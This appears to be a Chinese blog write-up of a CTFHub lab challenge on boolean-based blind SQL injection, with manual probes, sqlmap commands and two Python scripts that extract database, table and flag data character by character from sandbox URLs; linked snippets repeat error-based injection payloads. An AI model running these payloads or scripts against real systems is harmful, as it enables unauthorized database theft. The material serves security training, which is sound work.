CTFHUB-技能树-Web题-SQL注入-布尔盲注

原创 已于 2024-05-09 21:14:47 修改 · 1k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #sql #数据库

于 2024-04-02 22:15:00 首次发布
本文介绍了布尔盲注攻击方法,涉及MySQL知识点,如unionselect、database()函数、version()等,展示了如何通过SQL注入来判断注入点、检测数据库名长度和猜测数据库名,以及使用python脚本和sqlmap工具进行攻击和数据提取的过程。
部署运行你感兴趣的模型镜像

技能树-Web题-SQL注入-布尔盲注

文章目录

布尔盲注
需要了解mysql的知识点:
union select 联合查询,联合注入常用
database() 回显当前连接的数据库
version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6
group_concat() 把产生的同一分组中的值用,连接,形成一个字符串
information_schema 存了很多mysql信息的数据库
information_schema.schemata information_schema库的一个表,名为schemata
schema_name schemata表中存储mysql所有数据库名字的字段
information_schema.tables 存了mysql所有的表
table_schema tables表中存每个表对应的数据库名的字段
table_name 表的名字和table_schema一一对应
information_schema.columns columns表存了所有的列的信息4
column_name 当你知道一个表的名字时,可通过次字段获得表中的所有字段名(列名)
table_name 表的名字和column_name一一对应
select updatexml(1,concat(0x7e,database(),0x7e),1); 这里注意,只在databse()处改你想要的内容即可报错回显
right(str, num) 字符串从右开始截取num个字符
left(str,num) 同理:字符串从左开始截取num个字符
substr(str,N,M) 字符串,从第N个字符开始,截取M个字符
判断注入点

利用返回yes或no进行判断注入

输入1 (也可输入1 and 1=1)返回 query_success

在这里插入图片描述

输入1’ (也可输入1 and 1=2)返回query_error
在这里插入图片描述

说明存在注入点

判断数据库名长度

发现1 and length(database()) >=1 正确
1 and length(database()) >=5 错误
1 and length(database()) >=4正确

所以判断当前数据库长度为4

猜数据库名

由于返回值是正确或错误,寻常and 后面布尔盲注语句不好使,因为它们是根据查询结果为空来判断。
这时候想到用if语句

if(expr1,expr2,expr3),如果expr1的值为true,则执行expr2语句,如果expr1的值为false,则执行expr3语句。

于是要确定数据库名字,利用语句:

if(substr(database(),1,1)='s',1,(select table_name from information_schema.tables))

if(substr(database(),1,1)='a',1,(select table_name from information_schema.tables))

1 and substr(database(),1,1)='s'

1 and substr(database(),1,1)='a'

要一个一个判断有点难,可以用python脚本

也可以利用sqlmap来跑

sqlmap

爆表

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 --dbs

找flag

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

然后脱库

python sqlmap.py -u http://challenge-7d72ad3c949e8282.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump
python代码
import requests
import time

urlOPEN = 'http://challenge-80bbba4d1e9ce716.sandbox.ctfhub.com:10080/?id='
starOperatorTime = [] 
mark = 'query_success'

def database_name():
	name = ''
	for j in range(1,9):
		for i in 'sqcwertyuioplkjhgfdazxvbnm':
			url = urlOPEN+'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' %(j,i)
			# print(url+'%23')
			r = requests.get(url)
			if mark in r.text:
				name = name+i
				

				print(name)
				
				break
	print('database_name:',name)

	
database_name()

def table_name():
    list = []
    for k in range(0,4):
        name=''
        for j in range(1,9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN+'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
			    # print(url+'%23')
                r = requests.get(url)
                if mark in r.text:
                    name = name+i
                    break
        list.append(name)
    print('table_name:',list)

#start = time.time()
table_name()
#stop = time.time()
#starOperatorTime.append(stop-start)
#print("所用的平均时间: " + str(sum(starOperatorTime)/100))

def column_name():
    list = []
    for k in range(0,3): #判断表里最多有4个字段
        name=''
        for j in range(1,9): #判断一个 字段名最多有9个字符组成
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url=urlOPEN+'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' %(k,j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+i
                    break
        list.append(name)
    print ('column_name:',list)

column_name()

def get_data():
        name=''
        for j in range(1,50): #判断一个值最多有51个字符组成
            for i in range(48,126):
                url=urlOPEN+'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' %(j,i)
                r=requests.get(url)
                if mark in r.text:
                    name=name+chr(i)
                    print(name)
                    break
        print ('value:',name)
    
get_data()

在这里插入图片描述
在这里插入图片描述

第二个

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import sys
session=requests.session()
url = "http://challenge-230a3ccdd5ccd1a7.sandbox.ctfhub.com:10800/?id="
name = ""

# for k in range(1,10):
#     for i in range(1,10):
#         print(i)
#         for j in range(31,128):
#             j = (128+31) -j
#             str_ascii=chr(j)
#             #数据库名
#             #payolad = "if(substr(database(),%s,1) = '%s',1,(select table_name from information_schema.tables))"%(str(i),str(str_ascii))
#             #表名
#             #payolad = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(k,i,str(str_ascii))
#             #字段名
#             payolad = "if(substr((select column_name from information_schema.columns where table_name='flag' and table_schema='sqli'),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(i,str(str_ascii))
#             str_get = session.get(url=url + payolad).text
#             if "query_success" in str_get:
#                 if str_ascii=="+":
#                    sys.exit()
#                 else:
#                     name+=str_ascii
#                     break
#         print(name)

#查询字段内容
for i in range(1,50):
    print(i)
    for j in range(31,128):
        j = (128+31) -j
        str_ascii=chr(j)
        payolad = "if(substr((select flag from sqli.flag),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(i,str_ascii)
        str_get = session.get(url=url + payolad).text
        if "query_success" in str_get:
            if str_ascii == "+":
                sys.exit()
            else:
                name += str_ascii
                break
    print(name)

在这里插入图片描述

您可能感兴趣的与本文相关的镜像

Python3.9

Python3.9

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

CTFHUB-SQL注入-布尔盲注
weixin_68416970的博客
06-12 1309
布尔盲注是一种在SQL注入中使用的技巧,主要用于在没有明显错误信息返回的情况下,通过构造特殊的SQL语句来推测数据库信息。由于某些安全措施的存在,使得传统的SQL注入手法无法获得直接的错误信息,此时就需要使用布尔盲注来间接获取信息。这种方法主要依赖于SQL语句的布尔运算结果,通过观察页面的响应来判断所构建的SQL语句是否执行成功,从而逐步揭示数据库的结构信息。
CTFHub技能树web(持续更新)--SQL注入--布尔盲注
jiuyongpinyin的博客
08-14 1203
布尔盲注 这道如果使用盲注的话,会很费劲。首先,这道是基于真假的盲注,所以我们需要将他的每一个字母转换为ascii码,然后通过回显进行判断: 我们通过这个判断了数据库的第一个字母是 > a 的,也就是在a的后面,这样逐个爆破很麻烦,所以我们直接用工具sqlmap,首先爆破数据库: 得到数据库,接着我们爆破表: 得到两个列,我们查看flag这个表里面的列: 得到flag这个列,接着我们查看字段: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指
CTFhub 报错注入
plant1234的博客
06-16 339
报错注入: 需要了解mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schema库的一个表,名为schemata sc
ctfhub-报错注入
m0_62094846的博客
12-22 507
查找库名 1 and extractvalue(1,concat(0x7e,database(),0x7e)) 查找表名 1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) 查找字段 1 and extractvalue(1,concat(0x7e,(select gr..
CTFHub(报错注入
sGanYu
07-24 1973
手动注入 发现无论输入什么,都只会回显成功或者错误 可以根据updatexml的报错注入来获取信息 updatexml (string, xpath_string, string) 第一个参数:可以输入1,为XML文档对象的名称 第二个参数:xpath_string ,提取多个子节点的文本 第三个参数:可以输入1,替换查找的符合条件的参数 0x7e是一个代表~的十六进制,可以用’%’,或者’~’来代替 查询出两个表,一个为news一个为flag,这里也可以把'sqli'换成database
CTFhub布尔盲注
ndjnddjxn的博客
04-12 1761
如果目标元素大于/小于中间元素,则在数组大于/小于中间元素的那一半区域查找,然后重复步骤(1)的操作。首先,从数组的中间元素开始搜索,如果该元素正好是目标元素,则搜索过程结束,否则执行下一步。),手工注入比较麻烦,一般使用工具sqlmap,burpsuite辅助,或者使用脚本。返回从下标为from截取长度为length的str子串。提高效率,枚举法,延时法写得脚本,运行出有时花的时间太长。参考高中数学的函数二分法求根,将数据库名切片,循环i次,i是字符下标。输入3,只回显对和错,确定是布尔盲注
CTFHUB技能树SQL——布尔盲注
weixin_73049307的博客
10-16 1849
显示查询成功但没有回显出相关信息,初步判断是布尔盲注入、时间盲注或报错注入。还是没有回显,到这里已经可以确认是布尔盲注了,且是整数型注入。第一个字符是"f",后续就不多描述了,是flag表。第一个字符是"f",后续就不多描述了,是flag列。后续流程实在是太长了,就直接用sqlmap直接爆了。这里为了节省时间就直接爆第二个表的字符了。说明第一个字符是115,对应字符's'(因为知道是news表和flag表)(4)爆字段内容(flag)查询成功,说明表有两个。说明第一个字符是"c"得到数据库名长度是4。
CTFHUB-技能树-WEB-SQL注入
慢就是快
04-16 648
文章目录1.整数型注入2.字符型注入3.报错注入4.布尔注入5.时间盲注5.MYSQL结构6.Cookie 注入7.UA注入8.Referer注入9.过滤空格 1.整数型注入 ?id=-1 order by 2 --+ true # 两个字段 ?id=-1 order by 3 --+ false ?id=-1 union select 1,2 --+ --+ #说明存在两个显示位置,id=-1是为了将显示位置腾空,方便回显数据显示 id=-1 union select 1,group_concat(s
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 1038
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
解记录-CTFHub技能树|Web|SQL注入
weixin_57448435的博客
09-14 2649
数据库注入
CTFHub (web-SQL-布尔盲注sqlmap)
m0_64444909的博客
05-09 961
一、关于sqlmap 一款自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语
ctfhub-sql布尔盲注
god_001的博客
06-01 913
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
CTFHub - 报错注入
Have_a_great_day的博客
09-09 1367
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2863
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
CTFHUB(WEB) 报错注入
qq_54929891的博客
09-17 457
在经历了整数型注入和数字注入后自信满满的打开了报错注入,结果不回显正确内容,只回显正确或错误的情况让我无从下手,没办法,身为小白只能继续去找资料学习一下如何做这种目了 学了一会儿,发现有很多办法,但我学的是最简单的一种办法,其他办法以后在实践中慢慢的学习 这个方法利用的是count(),rand(),floor(),group by()这几个函数的组合来利用报错信息出来我们需要查询的内容 count():返回匹配指定条件的行数。count(*)返回表中的记录数(不添加的话会出现列不对应的情况,可以试
mysql报错注入ctf_ctfhub技能树sql注入—报错注入
weixin_29350039的博客
01-27 273
打开靶机 payload1 Union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group by x;payload拆分讲解1 count():count()函数返回匹配指定条件的行数。count(*)函数返回表中的记录数2 floor():floor:函数是用来向下...
CTFHub——技能树——SQL注入sqlmap)
sparename的博客
12-26 7893
SQL注入整数型注入sqlmap简介检测注入实战解字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入UA注入Refer注入过滤空格 整数型注入 sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用u
CTFHub 报错注入
weixin_44732566的博客
02-20 4384
CTFHub 报错注入注入点不回显数据库查询的数据,那么通过一般的注入手段是无法返回相关数据库的信息,但是,如果查询时输入错误SQL代码会报错,并且是通过mysql_error(),mysqli_error()等返回错误。 ...
CTFHUB-报错注入
Web学习之路
03-21 326
理解
ctfhub技能树sql注入
最新发布
08-23
SQL注入是一种常见的Web安全漏洞,攻击者可以通过它执行恶意的SQL代码,从而绕过应用程序的安全措施,访问或操纵数据库中的数据。在CTFHubSQL注入技能树中,涵盖了多种SQL注入技术,包括字符型注入布尔盲注、联合查询注入等,每种技术都有其特定的利用方式和防御方法。 ### SQL注入原理 SQL注入通常发生在应用程序未正确过滤用户输入的情况下,攻击者可以将恶意的SQL代码插入到查询中,从而改变查询的逻辑。例如,在一个简单的登录查询中,如果用户输入的用户名和密码未经过滤,攻击者可以输入特定的字符串来绕过身份验证。一个典型的例子是使用`' OR '1'='1`这样的输入,使得查询始终返回真值,从而绕过验证机制[^1]。 ### SQL注入利用方式 1. **字符型注入**:这种类型的注入通常发生在应用程序将用户输入直接拼接到SQL查询中,而没有进行适当的过滤或转义。攻击者可以输入包含特殊字符的字符串,如单引号,来改变查询的结构。例如,输入`1' AND 1=2 UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database() -- `可以用来获取数据库中的表名[^4]。 2. **布尔盲注**:在这种注入中,攻击者通过发送特定的SQL查询来判断数据库的某些条件是否为真,从而推断出数据库的结构或内容。例如,使用`1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='sqli')=x`这样的查询,攻击者可以通过观察应用程序的响应来判断数据库中表的数量[^5]。 3. **联合查询注入**:攻击者可以利用`UNION`操作符来合并多个查询的结果,从而获取额外的信息。例如,使用`1 UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()`可以获取当前数据库中的所有表名[^4]。 ### SQL注入防御方法 为了防止SQL注入攻击,应用程序开发人员可以采取以下几种措施: - **使用参数化查询**:参数化查询(也称为预编译语句)可以确保用户输入被视为数据而不是可执行代码,从而防止攻击者修改查询的结构。 - **输入验证**:对用户输入进行严格的验证,拒绝包含特殊字符的输入,或者对输入进行适当的转义处理。 - **最小权限原则**:确保数据库账户仅具有完成其任务所需的最小权限,这样即使发生注入攻击,攻击者的破坏也会受到限制。 - **错误信息处理**:避免向用户显示详细的错误信息,这些信息可能包含敏感的数据库结构信息,攻击者可以利用这些信息进行进一步的攻击。 ### 使用sqlmap进行SQL注入 sqlmap是一个自动化的SQL注入工具,可以帮助安全研究人员发现和利用SQL注入漏洞。以下是一些常用的sqlmap命令示例: ```bash # 获取数据库列表 sqlmap -u "http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1" --dbs # 获取指定数据库中的表名 sqlmap -u "http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1" -D sqli --tables # 获取指定表中的列名 sqlmap -u "http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag --columns # 获取指定列的数据 sqlmap -u "http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1" -D sqli -T flag -C flag --dump ``` 这些命令展示了如何使用sqlmap来自动化地发现和利用SQL注入漏洞,从而获取数据库的结构和数据。 ###
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

python炒粉

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值